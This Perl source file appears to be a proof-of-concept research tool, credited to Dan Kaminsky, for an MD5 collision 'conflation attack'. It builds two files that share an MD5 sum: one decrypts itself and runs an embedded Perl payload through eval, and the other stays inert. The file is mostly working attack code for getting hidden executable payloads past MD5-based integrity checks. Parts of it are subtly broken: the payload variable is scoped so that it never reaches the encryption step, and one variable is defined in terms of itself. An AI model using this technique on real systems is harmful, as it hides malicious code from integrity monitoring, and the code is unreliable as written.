#!/usr/bin/perl
$VERSION = 1.1;
use Crypt::CBC;
use Digest::SHA1 qw(sha1 sha1_hex);
use Digest::MD5  qw(md5 md5_hex);
use Getopt::Std;
#use strict;

sub usage{
    print STDERR <<"EOD";
stripwire $VERSION:  Conflation Attack Using Colliding MD5 Test Vectors
      Author:                     Dan Kaminsky(dan\@doxpara.com)
     Example:  ./stripwire.pl -v -b test.pl -r fire.bin
     Options:  -b [file.pl]    :  Build encrypted archives of this perl code
               -r [file.bin]   :  Attempt to self-decrypt and execute this file 
               -v              :  Increase verbosity.
               -a              :  Rename   active payload (fire.bin)
               -i              :  Rename inactive payload ( ice.bin)
EOD
   exit 1;
}

# Theorem:  If md5(x) == md5(y), then md5(x+q) == md5(y+q)
#          (assuming length(x) and length(y) are 0 mod 64,
#           and q is any arbitrary data).
#           True because once two blocks converge upon the same hash, the nature
#           of them being different has thereafter been lost.

# Let:  Vec1 and Vec2 equal our two files ("vectors") with the same hash

my $vec1 = h2b("
d1 31 dd 02 c5 e6 ee c4 69 3d 9a 06 98 af f9 5c
2f ca b5 87 12 46 7e ab 40 04 58 3e b8 fb 7f 89
55 ad 34 06 09 f4 b3 02 83 e4 88 83 25 71 41 5a
08 51 25 e8 f7 cd c9 9f d9 1d bd f2 80 37 3c 5b
d8 82 3e 31 56 34 8f 5b ae 6d ac d4 36 c9 19 c6
dd 53 e2 b4 87 da 03 fd 02 39 63 06 d2 48 cd a0
e9 9f 33 42 0f 57 7e e8 ce 54 b6 70 80 a8 0d 1e
c6 98 21 bc b6 a8 83 93 96 f9 65 2b 6f f7 2a 70
");

my $vec2 = h2b("
d1 31 dd 02 c5 e6 ee c4 69 3d 9a 06 98 af f9 5c
2f ca b5 07 12 46 7e ab 40 04 58 3e b8 fb 7f 89
55 ad 34 06 09 f4 b3 02 83 e4 88 83 25 f1 41 5a
08 51 25 e8 f7 cd c9 9f d9 1d bd 72 80 37 3c 5b
d8 82 3e 31 56 34 8f 5b ae 6d ac d4 36 c9 19 c6
dd 53 e2 34 87 da 03 fd 02 39 63 06 d2 48 cd a0
e9 9f 33 42 0f 57 7e e8 ce 54 b6 70 80 28 0d 1e
c6 98 21 bc b6 a8 83 93 96 f9 65 ab 6f f7 2a 70
");

# Acquire options from command line
my %opts = read_stripwire_options();

# Let:  Payload equal our the set of commands we want to encode
if(length($opts{build})){
   my $payload = readfile($opts{build});
}

# Let:  Key equal the SHA-1 of Vec1
my $key = sha1($vec1);

# Let:  Encrypted Payload equal the Payload encrypted with the SHA-1 of
#       the first test vector
my $encrypted_payload = encrypt($payload, sha1($vec1));

# Let:  Fire equal the first test vector concatenated with the encrypted payload.
#       Notice how fire is ultimately decryptable, since you can take that first
#       test vector, sha-1 it, and acquire the key to the encrypted payload.
my $fire = $vec1 . $encrypted_payload;

# Let:  Ice equal the second test vector concatenated with the encrypted payload.
#       Notice how ice does not contain sufficient context inside itself to allow
#       itself to be decrypted -- you can't SHA-1 vec2 to get the key.  As such,
#       all you have is an arbitrary payload frozen within an encrypted bitstream.
#       Not very useful.
my $ice = $vec2 . $encrypted_payload;

# Write Fire and Ice
if($opts{build}){
  frost($opts{active},   $fire);  # x + q
  frost($opts{inactive}, $ice);   # y + q

# Show MD5 and SHA-1 hashes of our output.
  if($opts{verbose}){
    print "$opts{active}: md5  = ", md5_hex($fire), "\n";
    print "$opts{inactive}:  md5  = ", md5_hex($ice), "\n";  
    print "$opts{active}: sha1 = ", sha1_hex($fire), "\n";
    print "$opts{inactive}:  sha1 = ", sha1_hex($ice), "\n";
  }
}


# Now, lets try to decrypt our data.

if(length($opts{run})){
   my $candidate =   readfile($opts{run});

#  See how we're not providing a key to the decryption process?  There's one of
#  two possibilities:
#  Fire -- We're able to sha1 the first 128 bytes of this file, yielding us a
#          key that effectively decrypts the rest of the file.
#  Ice --  We can sha1 the first 128 bytes if we like, but the key won't yield
#          a successful decryption.
#  NOTE THAT FIRE AND ICE HAVE THE SAME MD5 SUM
   my $payload = self_decrypt($candidate);
   if(length($payload)) { eval $payload }
   else {
     if($opts{verbose}) { print "Unable to decrypt file: $opts{run}"};
   }
}

# Below here -- I need to comment this more.

if(!length($opts{run}) && !length($opts{build})) { usage(); }


# Encrypt:  AES-CBC $payload with $key, returning $encrypted_payload.  Embed
#           the key itself as a way to validate successful decryptions.
#           IV is managed by Perl.
sub encrypt{
    my @args = @_;
    my $payload = $args[0];
    my $key     = $args[1];
    
    # We want a 128 bit AES key.  128 / 8 = 16 bytes.
    if(length($key) != 16) { $key = substr($key, 0, 16); }
    
    # Prepending data with the key.  This is a bit questionable, but it
    # gives us a good way of later verifying if the decryption was
    # successful or not.
    $payload = $key . $payload;

    # Set em up...
    my $cipher= Crypt::CBC->new( { 'key' => $key,
                               'cipher' => 'Rijndael',
                               'prepend_iv'=> 1} );
    
    # ...and knock 'em down:
    
    return $cipher->encrypt($payload);
}
# Self_Decrypt:  AES-CBC decrypt $candidate file using the (truncated) sha-1  
#                hash of the first 128 bytes as a key.  Validate that
#                decryption was successful by seeing if the first 16 bytes of
#                the decrypted payload match the 16 bytes of the truncated key.

sub self_decrypt{
    my @args = @_;
    my $candidate = $args[0];
    
    my $candidate_vec = substr($candidate, 0, 128);
    my $key = sha1($candidate_vec);

    # We want a 128 bit AES key.  128 / 8 = 16 bytes.
    if(length($key) != 16) { $key = substr($key, 0, 16); }

    my $cipher= Crypt::CBC->new( { 'key' => $key,
                               'cipher' => 'Rijndael',
                               'prepend_iv'=> 1} );

    my $encrypted_payload = substr($candidate, 128, length($candidate));
    my $decrypted = $cipher->decrypt($encrypted_payload);
    
    my $verifier = substr($decrypted, 0, 16);
    my $candidate_payload = substr($decrypted, 16, length($candidate_payload));
    
    my $payload;
    
    # See if the verifier extracted above indeed matches the key we
    # decrypted the file with.  If so, we win.
    if($verifier eq $key) {
       $payload = substr($decrypted, 16, length($decrypted));
    };
    return $payload;
}

# h2b:  Convert hexadecimal to binary.  This is wildly unoptimized.
sub h2b{
    my @args = @_;
    my $val  = $args[0];
       $val  =~s/[^a-f0-9]//g;
    my $i;
    my $return;

    for($i=0; $i < length($val); $i+=2){
        my $hi = substr($val, $i,   1);
        my $lo = substr($val, $i+1, 1);
        $return = $return . pack("C", hex($hi . $lo));
    }
    return $return;
}

sub read_stripwire_options{
   my %opts = (
             'active'   => "fire.bin",
             'inactive' =>  "ice.bin",
             'verbose' => "0",
             'build'  => "",
             'run'    => "",
   );
   getopts('p:a:i:vb:r:');

   unless(!length($opt_a)) {$opts{active} = $opt_a;}
   unless(!length($opt_i)) {$opts{inactive} = $opt_i;}
   unless(!length($opt_v)) {$opts{verbose} = $opt_v;}
   unless(!length($opt_b)) {$opts{build} = $opt_b;}
   unless(!length($opt_r)) {$opts{run}= $opt_r;}
   return %opts;
}

sub readfile{
   my @args = @_;
   my $file = $args[0];
   
   open IN, $file or die "$file: $!";
   binmode IN;
   
   my $tmp, $payload;
   while(read(IN, $tmp, 1024 * 32)) { $payload = $payload . $tmp };
   
   close IN;
   return $payload;
}  

# Frost:  Write $data to $dest.
sub frost{
   my @args=@_;
   my $dest = $args[0];
   my $data = $args[1];

   if($dest eq "-") { print STDOUT $data; }
   else {
      open(OUT, ">$dest");
      syswrite(OUT, $data, length($data));
      close OUT;
   }
}

